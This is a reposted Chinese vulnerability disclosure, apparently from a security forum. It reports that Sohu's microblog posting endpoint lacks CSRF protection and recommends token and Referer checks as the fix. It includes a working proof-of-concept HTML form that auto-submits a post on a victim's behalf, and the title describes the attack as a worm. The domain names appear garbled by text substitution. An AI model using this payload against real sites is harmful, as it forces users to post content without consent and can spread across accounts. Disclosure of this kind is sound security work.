搜狐个人中心http://i.sohu测试数据也有发微博功能,和http://t.sohu测试数据是同步的,那么,就来抓抓包看看吧。
看到了吗,没有token有木有!!!!!
POC:
<form action="http://i.sohu测试数据/a/app/mblog/save.htm?_input_encode=UTF-8" method="POST"> <input type="text" name="content" value="csrf test" /> </form> <script>document.forms[0].submit();</script>修复方案: token+Referer
查看更多关于搜狐微博继续csrf蠕虫发微博 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15047